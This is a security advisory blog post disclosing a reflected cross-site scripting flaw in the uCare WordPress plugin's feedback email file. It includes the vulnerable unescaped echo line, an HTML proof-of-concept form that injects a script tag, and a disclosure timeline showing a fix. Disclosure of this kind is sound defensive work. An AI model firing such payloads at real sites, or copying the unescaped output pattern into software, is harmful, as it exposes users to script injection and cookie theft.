22 Jun

Reflected Cross-Site Scripting (XSS) Vulnerability in uCare

We recently have been trying to get an idea of how effective it would be to try to proactively catch some vulnerabilities when changes are made to WordPress plugins that include those vulnerabilities. During that preliminary checking we found that the plugin uCare contains a reflected cross-site scripting (XSS) vulnerability.

The vulnerability is an example of where one of things we check for during our security reviews of WordPress plugins selected by our customers, making sure that code is included to restrict direct access to .php files that are not intended to accessed, can be useful.

When deactivating the plugin and choosing to provide feedback the file /emails/product-feedback.php in included to generate the feedback message. That file can be accessed directly.

When accessed as intended the use of output buffering causes the content output by the file to not be displayed in the web browser. But when accessed directly that doesn’t occur and several post inputs are output without being escaped. As an example, on line 6 the POST input “reason” is output:

<p style="margin-left: 20px"><?php echo $_POST['reason']; ?></p>

That could be used to cause malicious JavaScript code to output on to the page.

We contacted the developer of the plugin about the issue a week ago, but we have not heard back from them and the vulnerability has yet to be fixed.

Proof of Concept

The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/ucare-support-system/emails/product-feedback.php" method="POST">
<input type="hidden" name="reason" value='<script>alert("XSS");</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 15, 2017 – Developer notified.
  • June 27, 2017 – Version 1.3.0 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *